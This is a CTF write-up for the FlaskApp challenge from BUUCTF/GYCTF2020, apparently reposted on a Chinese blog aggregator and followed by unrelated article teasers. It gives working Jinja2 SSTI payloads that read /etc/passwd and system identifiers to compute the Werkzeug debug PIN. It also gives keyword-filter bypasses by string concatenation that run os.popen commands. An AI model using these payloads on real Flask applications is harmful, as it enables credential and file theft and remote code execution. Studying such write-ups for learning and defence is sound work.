当前位置：首页 > news >正文

buuctf_练[GYCTF2020]FlaskApp

news 文章来源：https://blog.csdn.net/m0_66225311/article/details/134059116 2025/5/14 18:32:54

[GYCTF2020]FlaskApp

文章目录

- - [GYCTF2020]FlaskApp
  - 常用绕过方法
  - 掌握知识
  - 解题思路
  - - 解题一 -- 计算pin码
    - 解题二 -- 拼接绕过执行命令
  - 关键paylaod

常用绕过方法

ssti详解与例题以及绕过payload大全_ssti绕过空格_HoAd’s blog的博客-CSDN博客

CTF 对SSTI的一些总结 - FreeBuf网络安全行业门户

掌握知识

ssti的python debug的PIN码计算，调用debug命令行执行命令。存在ssti注入就能进行命令执行，使用拼接操作绕过关键字过滤['o'+'s']。不同版本的python计算pin码的代码不同。python的模板注入可以通过for循环遍历子类特征名的方式，来寻找能够执行命令的子类模块

其实计算pin码的题目不应该存在ssti模板注入，只需要有文件读取和文件包含漏洞就行，这样也就不会利用ssti模板注入进行任意代码执行了

解题思路

解题一 – 计算pin码

打开题目链接，根据题目内容明显是一个flask模板的ssti注入，查看一下hint界面，在源码中发现pin字样。前几天刚学完，在debug的环境下输入PIN码调用python的交互式shell

先来列举一下PIN码计算的六个关键参数吧，pin码计算一定需要有文件包含和文件读取的漏洞。ssti就可以调用内部命令进行文件读取

username：  运行该Flask程序的用户名  /etc/passwd文件内
modname：   模块名  flask.app
getattr()： app名，值为Flask
getattr()： Flask目录下的一个app.py的绝对路径，这个值可以在报错页面看到。但有个需注意，Python3是 app.py，Python2中是app.pyc。  报错页面回显(访问报错界面 输入不能识别的参数)
str(uuid.getnode())：  MAC地址，读取这两个文件地址：/sys/class/net/eth0/address或者/sys/class/net/ens33/address
get_machine_id()：  系统id  /etc/machine-id    或者docker环境id /proc/self/cgroup

了解了需要读取的文件目录，就要开始找能够执行文件读取函数的模块子类了。经过测试，在加密界面输入ssti注入paylaod，在将加密的内容解密就能触发执行结果。找到了ssti注入点，开始寻找要利用的模块子类了

python的ssti注入可以利用for循环遍历子类，通过if判断想寻找的子类名是否存在，存在的话就执行后面代码，就是遍历子类名，寻找能够执行命令的子类，得到主机用户名为flaskweb

{% for x in {}.__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x.__init__.__globals__['__builtins__'].open('/etc/passwd').read() }}{%endif%}
{%endfor%}

通过输入不合规则的数据进行解密，成功导致页面报错，得到了Python的app.py的版本号和绝对路径，根据版本的不同需要执行不同的代码进行计算pin码。输入pin码的界面可以查看目录console，也可以在报错界面右面直接进入

接下来继续使用遍历子类的方式来读取MAC地址和主机id /sys/class/net/eth0/address /etc/machine-id，换一种方式，使用遍历paylaod只需要把上面的文件名进行修改即可得到。下面换另外一个子类进行命令执行，只需要查询一下所有子类，将网页回显的内容粘贴到notepad上，将空格替换成\n换行，即可显示为每一行为一个子类，只需要全局搜索一下常见可以利用的子类看其行号即可确定所在的列表位置。

查看所有子类
{{().__class__.__bases__[0].__subclasses__()}}下面是利用_frozen_importlib._ModuleLock子类进行命令执行
获取主机用户名
{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}获取MAC地址
{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/sys/class/net/eth0/address').read()}}
5a:52:2f:5d:cc:5d   --->   99309028494429docker环境特有id
{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/proc/self/cgroup').read()}}
fc3dc388b7a8661f02eac8aefa9ffd2e6b5b7902b1369d6221cf4a51d8ff144a

得到了全部的pin码计算的条件之后，直接使用相应版本的pin码计算的脚本，输入相应参数执行即可拿下pin码，在相关界面输入pin码即可进去到Python的交互式界面，调用os模块进行命令执行，读取文件内容拿下flag

解题二 – 拼接绕过执行命令

既然存在ssti注入，还能执行文件读取函数，那肯定就能执行系统命令了，只不过是被过滤了罢了，只需要将被过滤的内容进行拼接即可绕过。使用burp抓包测试paylaod，发现过滤内容为import、os、popen、flag、eval、*、?
直接进行遍历子类，寻找能够执行os模块系统命令的子类模块，子类还是寻找存在warning字段的子类，进行命令执行

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x.__init__.__globals__['__builtins__']['__imp' + 'ort__']('o'+'s').__dict__['pop'+'en'] ('cat /this_is_the_f'+'lag.txt').read() }}{%endif%}
{%endfor%}

{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['__imp'+'ort__']('o'+'s').__dict__['po'+'pen'] ('ls /').read()}}

关键paylaod

遍历子类寻找能文件读取的子类  warnings.catch_warnings
{% for x in {}.__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x.__init__.__globals__['__builtins__'].open('/etc/passwd').read() }}{%endif%}
{%endfor%}遍历子类，找到能命令执行的子类
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x.__init__.__globals__['__builtins__']['__imp' + 'ort__']('o'+'s').__dict__['pop'+'en'] ('cat /this_is_the_f'+'lag.txt').read() }}{%endif%}
{%endfor%}直接调用子类进行文件读取和命令执行  _frozen_importlib._ModuleLock
{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}
{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['__imp'+'ort__']('o'+'s').__dict__['po'+'pen'] ('ls /').read()}}

buuctf_练[GYCTF2020]FlaskApp

[GYCTF2020]FlaskApp 文章目录 [GYCTF2020]FlaskApp常用绕过方法掌握知识解题思路解题一 -- 计算pin码解题二 -- 拼接绕过执行命令关键paylaod 常用绕过方法 ssti详解与例题以及绕过payload大全_ssti绕过空格_HoAd’s blog的博客-CSDN博客 CTF 对SSTI的一些总结 - FreeBuf网…...

编程日记 2023/10/27 19:52:55

针对element-plus，跳转jump（快速翻页）

待补充 const goToPage () > {const inputElement document.querySelector(.el-pagination .el-input__inner);console.log(inputElement, inputElement); } 打印之后可以看到分页跳转的数字输入框，是有进行处理的，max"102",是我自己的…...

编程日记 2023/10/27 19:51:54

【软件安装】Windows系统中使用miniserve搭建一个文件服务器

这篇文章，主要介绍如何在Windows系统中使用miniserve搭建一个文件服务器。目录一、搭建文件服务器 1.1、下载miniserve 1.2、启动miniserve服务 1.3、指定根目录 1.4、开启访问日志 1.5、指定启动端口 1.6、设置用户认证 1.7、设置界面主题 （…...

编程日记 2023/10/27 19:50:53

iOS .a类型静态库使用终端进行拆解和合并生成

项目中会用到许多第三方的.a类型的静态库，有时候会有一些静态库回包含相同文件而产生冲突，我们就需要对这个库进行去重的一个操作。一般有哪些文件冲突了，xcode报错都会有详细的提示。我们可以将这两个库合并，也可以其中一方中的文…...

编程日记 2023/10/27 19:48:51

react-组件间的通讯

一、父传子父组件在使用子组件时，提供要传递的数据子组件通过props接收数据 class Parent extends React.Component {render() {return (<div><div>我是父组件</div><Child name"张" age{16} /></div>)} }const Child …...

编程日记 2023/10/27 19:47:51

【广州华锐互动】VR公司工厂消防逃生演练带来沉浸式的互动体验

在工业生产过程中，安全问题始终是我们不能忽视的重要环节。特别是火灾事故，不仅会造成重大的经济损失，更会威胁到员工的生命安全。传统的消防安全训练方法，如讲座、实地演练等，虽然具有一定的效果，但是无法…...

编程日记 2023/10/27 19:46:50

可观察性支柱：探索日志、指标和跟踪

通过检查系统输出来测量系统内部状态的能力称为可观察性。当可以仅使用输出信息（即传感器数据）来估计当前状态时，系统就变得“可观察”。您可以使用来自 Observability 的数据来识别和解决问题、优化性能并提高安全性。在接下来的几节中&am…...

编程日记 2023/10/27 19:45:48

nginx浏览器缓存和上流缓存expires指令_nginx配置HTTPS

1.nginx控制浏览器缓存是针对于静态资源[js，css，图片等] 1.1 expires指令 location /static {alias/home/imooc;#设置浏览器缓存10s过期expires 10s;#设置浏览器缓存时间晚上22:30分过期expires @22h30m;#设置浏览器缓存1小时候过期expires -1h;#设置浏览器不缓存expires …...

编程日记 2023/10/27 19:44:47

文章目录 1. A HT Detection and Diagnosis Method for Gate-level Netlists based on Machine Learning摘要Introduction 2. 基于多维结构特征的硬件木马检测技术摘要Instruction 3. A Hardware Trojan Detection and Diagnosis Method for Gate-Level Netlists Based on Diff…...

编程日记 2023/10/27 19:43:45

腾讯云国际-如何使用对象存储COS在 CKafka 控制台创建数据异步拉取任务？腾讯云代充

操作场景 Datahub 支持接入各种数据源产生的不同类型的数据，统一管理，再分发给下游的离线/在线处理平台，构建清晰的数据通道。本文以 COS 数据为例介绍如何在 CKafka 控制台创建数据异步拉取任务，并对任务进行修改配置&#xf…...

编程日记 2023/10/27 19:42:44

内存马概念

内存马概念文章目录内存马概念木马演变内存使用条件内存缺点JAVA Web三大组件Listener:监听器servelet请求流程内存马分类内存演示内存马植入方式案例shiro反序列化漏洞植入内存马木马演变内存使用条件 1. 禁止外联 2. 文件监控、查杀 3. spring Boot，不支持js…...

编程日记 2023/10/27 19:41:43

交换机基础（四）：MSTP负载均衡配置案例

如图所示是某个企业内部核心网络的结构图，目前企业中有20个VLAN, 编号为VLAN1～VLAN20, 为了确保内部网络的可靠性，使用了冗余链路和MSTP 协议。为了能更好地利用网络资源和带宽，现管理员希望通过配置MSTP 的负载均衡实现网络带宽…...

编程日记 2023/10/27 19:40:43

C# OpenCvSharp Yolov8 Face Landmarks 人脸特征检测

效果项目代码 using OpenCvSharp; using OpenCvSharp.Dnn; using System; using System.Collections.Generic; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms;namespace OpenCvSharp_Yolov8_Demo {public partial class frmMain…...

编程日记 2023/10/27 19:39:42

计算机网络之数据链路层(全)

[复习提示] 王道：本章是历年考试中考查的重点。要求在了解数据链路层基本概念和功能的基础上，重点掌握滑动窗口机制、三种可靠传输协议、各种MAC协议、HDLC协议和PPP协议，特别是CSMA/CD协议和以太网帧格式，以及局域网的争用期和最…...

编程日记 2023/10/27 19:38:41

前端TypeScript学习-交叉类型与泛型

交叉类型和泛型是TypeScript中的两个重要概念。交叉类型（&）可以用来组合多个接口，形成一个新接口。它类似于接口继承（extends），但有一些区别。交叉类型不会产生类型继承层次结构，而是将多…...

编程日记 2023/10/27 19:37:40

科聪协作（复合）移动机器人整体解决方案

协作（复合）移动机器人（AGV/AMR）相较传统工业机器人具有更加安全和简单的工作优势，具备较强的发展潜力。协作（复合）移动机器人安全性和操作的简洁性、灵活性不断提高,优势得到了充分发挥,在越来越…...

编程日记 2023/10/27 19:36:39

RTE（Runtime Environment）

RTE（Runtime Environment）是一个运行时环境，在这个环境里，你可以实现的功能是： 作为一个缓冲buffer给应用层和BSW层的接口（例如COM）用来存储数据，也就是说定义一个全局变量供上层和下…...

编程日记 2023/10/27 19:35:38

搭建自己的搜索引擎——oh-my-search使用

搭建自己的搜索引擎——oh-my-search使用使用elasticsearch和search-ui搭建自己的搜索引擎，快速查找资源和文件。如果对代码感兴趣，相关代码已在github上开源，欢迎fork代码。搭建elasticsearch 先搭建eleasticsearch再搭建kibana 搭建e…...

编程日记 2023/10/27 19:34:37